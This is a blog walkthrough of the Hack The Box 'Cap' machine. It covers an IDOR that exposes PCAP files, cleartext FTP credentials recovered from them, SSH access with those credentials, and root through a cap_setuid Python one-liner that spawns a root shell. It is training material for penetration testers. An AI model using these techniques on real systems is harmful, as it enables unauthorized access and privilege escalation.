HACK THE BOX - CAP
The Cap machine on Hack The Box is an excellent example of how multiple subtle weaknesses can be chained together into a full system compromise. This walkthrough not only explains how to root the box, but also dives into the technical challenges encountered along the way, focusing on the reasoning process and the differences between how tools and systems behave. These nuances are essential for anyone working in cybersecurity, penetration testing, or building their own pentesting tools.
The process begins with standard reconnaissance against the target 10.129.25.236. Running a scan with “nmap -sC -sV 10.129.25.236” reveals a web application as the primary attack surface. Accessing the target through a browser presents a dashboard with several features, including a function labeled “Security Snapshot (5 Second PCAP + Analysis)”. At this point, the application appears simple, but a provided hint suggests running a scan and observing the URL of the page to which the user is redirected, noting that a portion of it remains constant.
The first real challenge arises when attempting to observe this behavior using command-line tools. Using curl with options such as “-I” to retrieve headers or “-L -v” to follow redirects does not reveal any HTTP redirection. Every response returns a 200 OK status, which seems inconsistent with the hint. This is a classic situation where understanding the difference between server-side and client-side behavior becomes critical.
The application does not perform a traditional HTTP redirect using a 3xx status code and a Location header. Instead, it returns an HTML page that contains logic instructing the client to navigate elsewhere. This redirect is handled entirely on the client side, usually via JavaScript or HTML meta refresh tags. Curl, being a tool that only processes raw HTTP responses, does not execute JavaScript and therefore exposes this intermediate page. A browser, on the other hand, parses the HTML, executes any embedded scripts, and automatically follows the redirect without showing the intermediate content.
HINT: During a pentest, it is essential to compare what the browser shows with what tools like curl or Burp Suite reveal. If a page appears to redirect in the browser but no HTTP 3xx response is visible, it is very likely that the behavior is client-side. In such cases, always inspect the raw HTML for indicators such as meta refresh directives, JavaScript-based navigation (for example window.location), or explicit messages revealing the destination URL.
NOTE: Understanding the distinction between client-side and server-side logic is fundamental. Server-side logic is enforced by the backend and cannot be bypassed from the client, while client-side logic relies on the user's environment and is inherently untrusted. Many vulnerabilities arise from developers assuming that client-side behavior is sufficient for enforcing security, which is never the case.
By requesting “curl http://10.129.25.236/capture”, the application reveals a message indicating a redirect to a path such as “/data/10”. This is the only visible reference point, which introduces another important challenge: there is no direct evidence of other accessible identifiers. Instead of assuming enumeration is possible, the approach must shift to hypothesis testing. By manually modifying the numeric portion of the URL and requesting paths such as “/data/0”, “/data/1”, and “/data/2”, it becomes clear that the application does not validate access to these resources.
This confirms the presence of an Insecure Direct Object Reference (IDOR) vulnerability. Although the application only exposes one endpoint through its interface, the underlying implementation relies on predictable numeric identifiers without enforcing authorization checks. This allows an attacker to access other users’ data simply by iterating through IDs.
Each of these endpoints provides access to a downloadable PCAP file. PCAP, or Packet Capture, files contain recorded network traffic and are commonly generated by tools such as tcpdump or Wireshark. They store raw packets, including protocol headers and payload data, allowing the reconstruction of full communication sessions. From a penetration testing perspective, PCAP files are extremely valuable because they can reveal sensitive information if the captured traffic is not encrypted.
Opening one of these files in Wireshark initially presents another challenge. Inspecting individual packets does not immediately reveal useful data, as meaningful information is often fragmented across multiple packets. The correct approach is to use the “Follow TCP Stream” functionality, which reconstructs entire communication flows between client and server. By iterating through different streams, it becomes possible to identify sessions containing relevant data.
In this case, one of the streams contains FTP traffic in cleartext, exposing the credentials “USER nathan” and “PASS Buck3tH4TF0RM3!”. This highlights the danger of using unencrypted protocols, as sensitive data can be intercepted and extracted with minimal effort.
With valid credentials available, the next step is gaining access to the system. While FTP login is possible, it provides limited interaction. Attempting SSH access with “ssh nathan@10.129.25.236” using the same password successfully grants a shell, allowing full user-level access and retrieval of the user flag.
The final stage involves privilege escalation. Running “getcap -r / 2>/dev/null” reveals that the binary “/usr/bin/python3.8” has the capability “cap_setuid”. This finding is highly significant and requires a deeper understanding to fully appreciate its impact.
In Linux, capabilities are a more granular alternative to traditional privilege models like SUID. Instead of granting full root privileges to a binary, specific capabilities can be assigned to allow limited privileged operations. The cap_setuid capability allows a process to change its user ID at runtime. In isolation, this might seem controlled, but when applied to an interpreter such as Python, it becomes extremely dangerous.
An interpreter is fundamentally different from a fixed-function binary because it allows the execution of arbitrary code. If Python has the ability to call setuid and switch its execution context to UID 0, then any code executed within that interpreter effectively runs as root. This means that an attacker can directly invoke system calls to elevate privileges without needing a memory corruption bug or a complex exploit chain.
In practical terms, this transforms Python into a privilege escalation vector. By executing “python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'”, the process sets its user ID to root and spawns a shell. This results in immediate root access, which can be verified with the “whoami” command. From there, accessing the root directory and retrieving the root flag completes the compromise.
This part of the attack is particularly important because it demonstrates how misconfigured capabilities can be just as dangerous as SUID binaries, yet are often overlooked. Many security assessments focus heavily on SUID checks while ignoring capabilities, making this a powerful and underutilized technique in real-world pentesting.
The Cap machine ultimately provides a comprehensive learning experience, combining web exploitation through IDOR, network traffic analysis via PCAP files, credential harvesting, and privilege escalation through Linux capabilities. It emphasizes the importance of understanding how different layers of a system interact and how small misconfigurations can lead to complete compromise.
This Hack The Box Cap walkthrough by Lorenzo Serafini demonstrates how attention to detail, combined with a solid understanding of underlying technologies, can turn a series of small observations into a full system takeover. It serves as a strong reference for anyone looking to deepen their expertise in cybersecurity and penetration testing.
$ hawk --status
[ HAWK SYSTEM ONLINE ]
Wait... are you asking about the Hawk Pentest Suite?
My own framework — release coming soon on GitHub.
> stay tuned











